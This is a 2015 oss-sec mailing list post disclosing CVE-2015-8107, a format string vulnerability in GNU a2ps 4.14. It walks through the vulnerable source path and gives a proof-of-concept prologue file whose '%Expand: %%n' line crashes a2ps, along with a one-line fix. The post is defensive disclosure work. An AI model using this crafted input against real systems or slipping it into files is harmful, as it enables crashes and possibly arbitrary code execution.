oss-sec mailing list archives
CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability
From: 김종권 <jgkim () ropas snu ac kr>
Date: Mon, 16 Nov 2015 19:24:18 +0900
Dear List,I am writing this to report a format string vulnerability in a2ps. (4.14, which is the latest version) Also I already have been assigned a CVE identifier from MITRE "CVE-2015-8107", so I want to make public this vulnerability.
- Target Platform Linux - Target Version 4.14 (Latest Version) - Vulnerability descriptionWhen user runs a2ps with malicious crafted pro(a2ps prologue) file, an attacker can execute arbitrary code.
The function output_file processes the %Expand command in pro file.The variable `expansion' in the function output_file may hold a malicious input string, which can be used as a format argument of vsprintf.
-- Step 1. (ouput.c 524 line) 524 expansion = ((char *) expand_user_string (job, FIRST_FILE (job), (const uchar *) "Expand: requirement", (const uchar *) token));For instance, the variable expansion will point to the string “%n” when a text line "%Expand: %%\n” exists in an input pro file.
-- Step 2. (output.c 525 line) 525 output (dest, expansion);output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as we described in step 1.
-- Step 3. (output.c 873 line) 182 void output (struct output * out, const char *format, ...){ ... 202 ds_unsafe_cat_vsprintf (out->chunk,format, args); ...The variable format, which can be malicious, can be passed to ds_unsafe_cat_vsprintf() in line 202.
-- step 4. (dstring.c 321 line)321 void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args){
... 326 vsprintf (ds->content + ds->len, format, args); ...The value of format, which can be malicious, is used as an argument of vsprintf in line 326, therefore arbitrary code can be executed.
-- Step 4. Our malicious input "exploit.pro" =================================== % -*-postscript-*- % PostScript Prologue % % $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $ % % % This file is part of a2ps. % % This program is free software; you can redistribute it and/or modify % it under the terms of the GNU General Public License as published by % the Free Software Foundation; either version 3, or (at your option) % any later version. % % This program is distributed in the hope that it will be useful, % but WITHOUT ANY WARRANTY; without even the implied warranty of % MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the % GNU General Public License for more details. % % You should have received a copy of the GNU General Public License % along with this program; see the file COPYING. If not, write to % the Free Software Foundation, 59 Temple Place - Suite 330, % Boston, MA 02111-1307, USA. % DocumentationThe layout is the same as samp(bw)samp, but alternating gray and white lines.
There are two macros defining the behavior: samp(pro.matrix.cycle)samp defines the length of the cycle (number of white and gray lines). It defaults to 6. samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3. EndDocumentation % -- code follows this line -- %%IncludeResource: file base.ps %%IncludeResource: file a2ps.hdr %%BeginResource: procset a2ps-matrix-Prolog 2.0 1 % Function T(ab), jumps to the n-th tabulation in the current line /T { cw mul x0 add y0 moveto } bind def % Function n: move to the next line /n { %def /y0 y0 bfs sub store % Draw a grey background /nline nline 1 add def % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ % @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@ %Expand: %%n % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ %Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge { gsave newpath x v get y0 currentfont /Descent get currentfontsize mul add moveto pw 0 rlineto 0 bfs rlineto pw neg 0 rlineto closepath 0.9 setgray fill grestore } if x0 y0 moveto } bind def % Function N: show and move to the next line /N { Show n } bind def /S { Show } bind def /p { false UL false BX %Face: Plain Courier bfs Show } bind def /sy { false UL false BX %Face: Symbol Symbol bfs Show } bind def /k { false UL false BX %Face: Keyword Courier-Oblique bfs Show } bind def /K { false UL false BX %Face: Keyword_strong Courier-Bold bfs Show } bind def /c { false UL false BX %Face: Comment Courier-Oblique bfs Show } bind def /C { false UL false BX %Face: Comment_strong Courier-BoldOblique bfs Show } bind def /l { false UL false BX %Face: Label Helvetica bfs Show } bind def /L { false UL false BX %Face: Label_strong Helvetica-Bold bfs Show } bind def /str{ false UL false BX %Face: String Times-Roman bfs Show } bind def /e{ false UL true BX %Face: Error Helvetica-Bold bfs Show } bind def %%EndResource %%BeginSetup % The font for line numbering /f# /Helvetica findfont bfs .6 mul scalefont def /nline 0 def %%EndSetup =================================== Execute =================================== ~ $ a2ps --version GNU a2ps 4.14 Written by Akim Demaille, Miguel Santana. Copyright (c) 1988-1993 Miguel Santana Copyright (c) 1995-2000 Akim Demaille, Miguel Santana Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ~ $ a2ps --prologue=exploit test.tex -o test.ps aborted (core dumped) =================================== - How to fix (output.c 525 line) 525 output (dest, expansion); ===> output (dest, "%s", expansion); - How we found the vulnerabilityWe used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked for a a2ps source code and found the bug.
Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed by Abstract Interpretation and the analysis is sound in design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience.
References [1]: http://ropas.snu.ac.kr/sparrow/[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14. [3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12
Sincerely, Woosuk Lee & Jong-Gwon Kim ----------------------------- Woosuk Lee Ph.D. candidate ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) wslee () ropas snu ac kr ----------------------------- ----------------------------- Jong-Gwon Kim Graduate student ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) jgkim () ropas snu ac kr -----------------------------
Current thread:
- CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability 김종권 (Nov 16)